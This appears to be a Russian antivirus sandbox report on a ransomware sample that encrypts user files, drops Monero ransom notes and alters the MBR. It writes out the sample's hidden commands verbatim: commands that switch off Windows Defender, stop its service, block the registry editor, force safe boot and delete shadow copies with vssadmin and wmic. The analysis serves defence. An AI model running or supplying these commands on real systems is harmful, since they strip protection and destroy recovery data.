Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\readme_xmr.txt
Модифицирует главную загрузочную запись (MBR).
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Редактора реестра (RegEdit)
удаляет теневые копии разделов.
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIOAVProtection $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableScriptScanning $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -SubmitSamplesConsent 2"
Запускает на исполнение
- '<SYSTEM32>\net.exe' stop WinDefend /y
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\cveuropeo.doc
- %HOMEPATH%\desktop\hanni_umami_chapter.doc
- %HOMEPATH%\desktop\ovp25012015.doc
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei51242\crypto\cipher\_arc4.pyd
- %TEMP%\_mei51242\crypto\cipher\_salsa20.pyd
- %TEMP%\_mei51242\crypto\cipher\_chacha20.pyd
- %TEMP%\_mei51242\crypto\cipher\_pkcs1_decode.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_aes.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_aesni.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_arc2.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_blowfish.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_cast.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_cbc.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_cfb.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_ctr.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_des.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_des3.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_ecb.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_eksblowfish.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_ocb.pyd
- %TEMP%\_mei51242\crypto\cipher\_raw_ofb.pyd
- %TEMP%\_mei51242\crypto\hash\_blake2b.pyd
- %TEMP%\_mei51242\crypto\hash\_blake2s.pyd
- %TEMP%\_mei51242\crypto\hash\_md2.pyd
- %TEMP%\_mei51242\crypto\hash\_md4.pyd
- %TEMP%\_mei51242\crypto\hash\_md5.pyd
- %TEMP%\_mei51242\crypto\hash\_ripemd160.pyd
- %TEMP%\_mei51242\crypto\hash\_sha1.pyd
- %TEMP%\_mei51242\crypto\hash\_sha224.pyd
- %TEMP%\_mei51242\crypto\hash\_sha256.pyd
- %TEMP%\_mei51242\crypto\hash\_sha384.pyd
- %TEMP%\_mei51242\crypto\hash\_sha512.pyd
- %TEMP%\_mei51242\crypto\hash\_ghash_clmul.pyd
- %TEMP%\_mei51242\crypto\hash\_ghash_portable.pyd
- %TEMP%\_mei51242\crypto\hash\_keccak.pyd
- %TEMP%\_mei51242\crypto\hash\_poly1305.pyd
- %TEMP%\_mei51242\crypto\math\_modexp.pyd
- %TEMP%\_mei51242\crypto\protocol\_scrypt.pyd
- %TEMP%\_mei51242\crypto\publickey\_curve25519.pyd
- %TEMP%\_mei51242\crypto\publickey\_curve448.pyd
- %TEMP%\_mei51242\crypto\publickey\_ec_ws.pyd
- %TEMP%\_mei51242\crypto\publickey\_ed25519.pyd
- %TEMP%\_mei51242\crypto\publickey\_ed448.pyd
- %TEMP%\_mei51242\crypto\util\_cpuid_c.pyd
- %TEMP%\_mei51242\crypto\util\_strxor.pyd
- %TEMP%\_mei51242\vcruntime140.dll
- %TEMP%\_mei51242\vcruntime140_1.dll
- %TEMP%\_mei51242\_asyncio.pyd
- %TEMP%\_mei51242\_bz2.pyd
- %TEMP%\_mei51242\_cffi_backend.cp313-win_amd64.pyd
- %TEMP%\_mei51242\_ctypes.pyd
- %TEMP%\_mei51242\_decimal.pyd
- %TEMP%\_mei51242\_hashlib.pyd
- %TEMP%\_mei51242\_lzma.pyd
- %TEMP%\_mei51242\_multiprocessing.pyd
- %TEMP%\_mei51242\_overlapped.pyd
- %TEMP%\_mei51242\_queue.pyd
- %TEMP%\_mei51242\_socket.pyd
- %TEMP%\_mei51242\_ssl.pyd
- %TEMP%\_mei51242\_wmi.pyd
- %TEMP%\_mei51242\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-fibers-l1-1-1.dll
- %TEMP%\_mei51242\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei51242\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-kernel32-legacy-l1-1-1.dll
- %TEMP%\_mei51242\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei51242\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei51242\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei51242\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-sysinfo-l1-2-0.dll
- %TEMP%\_mei51242\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei51242\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei51242\base_library.zip
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\installer
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\metadata
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\record
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\wheel
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\licenses\license
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\licenses\license.apache
- %TEMP%\_mei51242\cryptography-46.0.3.dist-info\licenses\license.bsd
- %TEMP%\_mei51242\cryptography\hazmat\bindings\_rust.pyd
- %TEMP%\_mei51242\libcrypto-3.dll
- %TEMP%\_mei51242\libffi-8.dll
- %TEMP%\_mei51242\libssl-3.dll
- %TEMP%\_mei51242\pyexpat.pyd
- %TEMP%\_mei51242\python3.dll
- %TEMP%\_mei51242\python313.dll
- %TEMP%\_mei51242\select.pyd
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei51242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei51242\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei51242\ucrtbase.dll
- %TEMP%\_mei51242\unicodedata.pyd
- %TEMP%\syskey.bin
- %ALLUSERSPROFILE%\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.x
- %ALLUSERSPROFILE%\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.x
- %ALLUSERSPROFILE%\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.x
- %ALLUSERSPROFILE%\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.x
- %ALLUSERSPROFILE%\microsoft\device stage\device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.x
- %ALLUSERSPROFILE%\microsoft\device stage\device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.x
- %ALLUSERSPROFILE%\microsoft\diagnosis\eventstore.db.x
- %ALLUSERSPROFILE%\microsoft\diagnosis\osver.txt.x
- %ALLUSERSPROFILE%\microsoft\diagnosis\scenariossqlstore\eventstore.db.x
- %ALLUSERSPROFILE%\microsoft\diagnosis\tenantstorage\p-aria\eventstore.db.x
- %ALLUSERSPROFILE%\microsoft\network\downloader\qmgr.db.x
- %ALLUSERSPROFILE%\microsoft\smsrouter\messagestore\smsinterceptstore.db.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\guest.png.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\user-192.png.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\user-32.png.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\user-40.png.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\user-48.png.x
- %ALLUSERSPROFILE%\microsoft\user account pictures\user.png.x
- %ALLUSERSPROFILE%\microsoft\windows defender.bak\scans\mpenginedb.db.x
- %ALLUSERSPROFILE%\microsoft\windows nt\msscan\welcomescan.jpg.x
- C:\readme_xmr.txt
- D:\readme_xmr.txt
- %HOMEPATH%\desktop\readme_xmr.txt
- %HOMEPATH%\documents\readme_xmr.txt
Изменяет расширения файлов пользовательских данных (Trojan.Encoder).
Другое
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableBlockAtFirstSeen $true"" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableBlockAtFirstSeen $true"
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableIOAVProtection $true"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisablePrivacyMode $true"" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisablePrivacyMode $true"
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableArchiveScanning $true"" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableArchiveScanning $true"
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableScriptScanning $true"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -SubmitSamplesConsent 2"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "net stop WinDefend /y" (со скрытым окном)
- '<SYSTEM32>\net1.exe' stop WinDefend /y
- '<SYSTEM32>\cmd.exe' /c "sc stop WinDefend" (со скрытым окном)
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled" (со скрытым окном)
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\cmd.exe' /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f" (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} safeboot minimal" (со скрытым окном)
- '<SYSTEM32>\bcdedit.exe' /set {default} safeboot minimal
- '<SYSTEM32>\cmd.exe' /c "vssadmin delete shadows /all /quiet" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic shadowcopy delete" (со скрытым окном)
